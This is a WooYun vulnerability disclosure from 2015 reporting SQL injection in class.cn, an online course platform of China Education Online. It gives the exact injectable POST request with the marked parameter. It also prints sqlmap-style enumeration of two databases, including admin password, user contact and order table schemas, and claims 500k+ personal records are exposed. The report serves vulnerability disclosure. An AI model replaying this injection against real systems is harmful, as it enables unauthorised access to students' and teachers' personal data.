当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124024

漏洞标题:中国教育在线某站存在SQL漏洞泄露50W+师生信息且危及主站

相关厂商:eol.cn

漏洞作者: 孤风

提交时间:2015-07-02 10:01

修复时间:2015-07-07 10:02

公开时间:2015-07-07 10:02

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-02: 细节已通知厂商并且等待厂商处理中
2015-07-07: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

好课网是中国教育在线的在线学习平台,该平台面向学习者提供涵盖基础教育、高等教育以及行业培训等海量优质网络课程,汇聚各行业精英,你可以自由选择你所需的或者感兴趣..

详细说明:

注入点

POST /ajax/course/list_course HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.class.cn:80/
Host: www.class.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
all_course=1&sort=publishtime-desc&tags[0]=1*&type_id=19


包括50W+的师生姓名,手机号,身份证号,学生订单,且包括主站的信息

漏洞证明:

QQ图片20150701232728.png


主站的数据

Database: eol_study2
[88 tables]
+-----------------------------------+
| Study_Aboutfile                   |
| Study_Admin_Manage                |
| Study_Coupon_Code                 |
| Study_Coupon_List                 |
| Study_Coupon_User_List            |
| Study_Coupon_log                  |
| Study_Course                      |
| Study_CourseTmp                   |
| Study_Course_Check_Log            |
| Study_Course_Comment              |
| Study_Course_DelFile_Log          |
| Study_Course_Live                 |
| Study_Course_LiveTmp              |
| Study_Course_Note                 |
| Study_Course_Num                  |
| Study_Course_Scale                |
| Study_Course_Section              |
| Study_Course_SectionTmp           |
| Study_Course_SectionTmp_Log       |
| Study_Course_Section_Aboutfile    |
| Study_Course_Section_Log          |
| Study_Course_Section_Teacher      |
| Study_Course_Section_Video        |
| Study_Course_Section_VideoTmp     |
| Study_Course_Section_VideoTmp_Log |
| Study_Course_Section_Video_Delete |
| Study_Course_Section_Video_Log    |
| Study_Course_Total_Scale          |
| Study_Course_Type                 |
| Study_Email_Send                  |
| Study_Interest                    |
| Study_Live_Callback_Log           |
| Study_Live_Message_Log            |
| Study_Live_Order_Log              |
| Study_Message                     |
| Study_Message_Send                |
| Study_My_Collect_Course           |
| Study_My_Study_Course             |
| Study_Open_Uid_Map                |
| Study_Order                       |
| Study_Order_Audit_Log             |
| Study_Order_Haoxue                |
| Study_Order_Log                   |
| Study_Order_Log_Dezhi             |
| Study_Order_Pay_Log               |
| Study_Stat_AboutFile              |
| Study_Stat_CourseHits             |
| Study_Stat_CourseScales           |
| Study_Stat_Course_Day             |
| Study_Stat_Course_Month           |
| Study_Stat_Course_Week            |
| Study_Stat_File_Day               |
| Study_Stat_File_Month             |
| Study_Stat_File_Week              |
| Study_Stat_Keywords               |
| Study_Stat_Keywords_Day           |
| Study_Stat_Keywords_Month         |
| Study_Stat_Keywords_Search        |
| Study_Stat_Keywords_Week          |
| Study_Stat_UserComments           |
| Study_Stat_UserHits               |
| Study_Stat_User_Day               |
| Study_Stat_User_Month             |
| Study_Stat_User_Week              |
| Study_Teacher                     |
| Study_User                        |
| Study_User_Check_Log              |
| Study_User_Comment_Log            |
| Study_User_Comment_Viewtime       |
| Study_User_Interest_lk            |
| Study_User_Msg                    |
| Study_User_Num                    |
| Study_User_Organization_Apply     |
| Study_User_Organization_Applytmp  |
| Study_User_Pay_Apply              |
| Study_User_Pay_Applytmp           |
| Study_User_Person_Apply           |
| Study_User_Person_Applytmp        |
| Study_User_Rakeback_Set           |
| Study_User_Weibo                  |
| Study_Void_Generator              |
| ci_sessions                       |
| class_active                      |
| class_cart                        |
| class_tag_course                  |
| class_tag_course_type             |
| class_tag_list                    |
| daemon                            |
+-----------------------------------+


Database: eol_study2
Table: Study_Admin_Manage
[8 columns]
+-----------+-------------+
| Column    | Type        |
+-----------+-------------+
| Id        | int(11)     |
| LastIp    | varchar(20) |
| LastLogin | datetime    |
| LoginNum  | int(11)     |
| Name      | varchar(20) |
| PassWord  | varchar(50) |
| Status    | tinyint(4)  |
| Suser     | tinyint(4)  |


50W+师生信息

Database: class_cn
[94 tables]
+---------------------------------------+
| ci_sessions                           |
| class_active                          |
| class_admin_function                  |
| class_admin_group                     |
| class_admin_group_function            |
| class_admin_member                    |
| class_admin_member_function           |
| class_app_course_type                 |
| class_app_feedback                    |
| class_app_version                     |
| class_cart                            |
| class_ccback_section_filename         |
| class_cooperation_order               |
| class_coupon_list                     |
| class_coupon_op_log                   |
| class_coupon_public_code              |
| class_coupon_single_code              |
| class_coupon_user_list                |
| class_course_amount                   |
| class_course_cc_video_undel           |
| class_course_chapter                  |
| class_course_chapter_section          |
| class_course_check                    |
| class_course_comment                  |
| class_course_detail                   |
| class_course_guide_doc                |
| class_course_list                     |
| class_course_note                     |
| class_course_rate                     |
| class_course_rate_detail              |
| class_course_section                  |
| class_course_section_check            |
| class_course_section_guide_doc        |
| class_course_section_multi            |
| class_course_section_teacher          |
| class_course_type                     |
| class_course_user_recommend           |
| class_email_send                      |
| class_live_course                     |
| class_live_course_check               |
| class_live_order                      |
| class_logs_coupon                     |
| class_logs_course_chapter_section_del |
| class_logs_course_check               |
| class_logs_course_delfile             |
| class_logs_course_section             |
| class_logs_course_section_check_del   |
| class_logs_course_section_multi_del   |
| class_logs_course_update              |
| class_logs_live_callback              |
| class_logs_live_course                |
| class_logs_live_course_del            |
| class_logs_live_message               |
| class_logs_order_charge_back          |
| class_logs_order_check                |
| class_logs_protocal_change            |
| class_logs_transcoder                 |
| class_logs_user_change                |
| class_logs_user_check                 |
| class_message                         |
| class_message_send                    |
| class_offline_protocol                |
| class_open_uid_map                    |
| class_order                           |
| class_order_dezhi                     |
| class_order_haoxue                    |
| class_order_log                       |
| class_order_pay_log                   |
| class_promote_course                  |
| class_promote_course_check            |
| class_promote_list                    |
| class_statistic_total                 |
| class_tag_course                      |
| class_tag_course_type                 |
| class_tag_list                        |
| class_user                            |
| class_user_comment                    |
| class_user_comment_viewtimes          |
| class_user_favorites_course           |
| class_user_msg                        |
| class_user_num                        |
| class_user_org_cert                   |
| class_user_org_cert_check             |
| class_user_pay_request                |
| class_user_pay_request_check          |
| class_user_person_cert                |
| class_user_person_cert_check          |
| class_user_ratio_set                  |
| class_user_settle                     |
| class_user_settle_order               |
| class_user_study_course               |
| class_user_teacher                    |
| class_user_weibo                      |
| class_void_generator                  |
+---------------------------------------+


订单详情

Database: class_cn
Table: class_order
[19 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| back_time      | datetime            |
| close_pay      | decimal(10,2)       |
| close_status   | tinyint(2) unsigned |
| close_time     | datetime            |
| course_id      | int(11) unsigned    |
| create_time    | timestamp           |
| create_user_id | int(11) unsigned    |
| due_pay        | decimal(10,2)       |
| expend_type    | tinyint(4) unsigned |
| ip             | char(15)            |
| is_back        | tinyint(2) unsigned |
| oid            | char(16)            |
| order_status   | tinyint(2) unsigned |
| order_user_id  | int(11) unsigned    |
| pay            | decimal(10,2)       |
| pay_flag       | tinyint(3) unsigned |
| pay_time       | datetime            |
| source         | tinyint(1) unsigned |
| void           | bigint(20)          |
+----------------+---------------------+


用户信息

Database: class_cn
Table: class_user
[34 columns]
+----------------+---------------------+
| Column         | Type                |
+----------------+---------------------+
| bad_comment    | int(11) unsigned    |
| contact_email  | varchar(50)         |
| create_time    | timestamp           |
| email          | varchar(100)        |
| gender         | enum('0','1','2')   |
| good_comment   | int(11) unsigned    |
| head_img       | varchar(200)        |
| interest       | varchar(1000)       |
| intro          | text                |
| is_check       | tinyint(2)          |
| is_pub_email   | tinyint(2)          |
| is_pub_mobile  | tinyint(2)          |
| is_pub_qq      | tinyint(2)          |
| is_pub_tel     | tinyint(2)          |
| is_pub_website | tinyint(2)          |
| is_pub_weibo   | tinyint(2)          |
| login_ip       | varchar(20)         |
| login_num      | int(11)             |
| login_time     | datetime            |
| mobile         | char(11)            |
| nick_name      | varchar(100)        |
| old_head_img   | varchar(100)        |
| pay_status     | tinyint(2) unsigned |
| qq             | varchar(20)         |
| rand_code      | varchar(32)         |
| real_name      | varchar(50)         |
| source         | varchar(10)         |
| status         | tinyint(2)          |
| tel            | varchar(20)         |
| up_time        | datetime            |
| user_id        | int(11)             |
| user_type      | tinyint(2)          |
| website        | varchar(200)        |
| weibo          | varchar(100)        |
+----------------+---------------------+

修复方案:

不知道

版权声明:转载请注明来源 孤风@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-07-07 10:02

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

2015-07-07:谢谢检查,我们尽快修复。